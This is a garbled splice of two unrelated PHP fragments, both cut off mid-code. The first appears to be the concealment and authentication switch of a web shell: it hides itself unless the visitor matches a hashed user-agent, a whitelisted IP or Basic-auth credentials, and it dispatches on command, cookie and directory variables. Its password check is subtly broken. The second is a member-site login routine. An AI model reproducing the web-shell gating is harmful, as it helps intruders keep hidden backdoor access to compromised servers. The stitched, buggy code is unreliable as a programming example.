// Authentication switcher case 0: break; case 1: if (md5($_SERVER['HTTP_USER_AGENT']) != $uakey) { hide(); } break; case 2: if (!in_array($_SERVER['REMOTE_ADDR'], $IP)) { hide(); } break; case 3: if (!$_SERVER["PHP_AUTH_USER"]) { userauth(); } break; } function userauth() { // Basic authentication function global $user, $pass; header("WWW-Authenticate: Basic realm='Secure Area'"); if (md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)) { hide(); die; } } if (!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img) { main();
<?php } } //------------ end else ---------------- /********************************************************* inLogin *********************************************************/ if (!isset($_SESSION['LoginID']) || empty($_SESSION['LoginID'])) { $ErrMsg = ""; if (!isset($ID)) { $ID = ""; } if (isset($Submit)) { if (strlen($ID) > 0 && strlen($ID) <= 15 && $ID == addslashes($ID)) { $Authorized = userauth($ID, $PWD, $db_conn); if ($Authorized) { $sqlcmd = "SELECT * FROM Member WHERE id='{$ID}' AND state<>'N'"; $rs = querydb($sqlcmd, $db_conn); $LoginID = $rs[0]['id']; $_SESSION['LoginID'] = $LoginID; //--------- For admin -------- if ($rs[0]['state'] == 'A') { $_SESSION['Admin'] = 1; } ?> <script language=javascript> location=$WebHost; </script> <?php exit;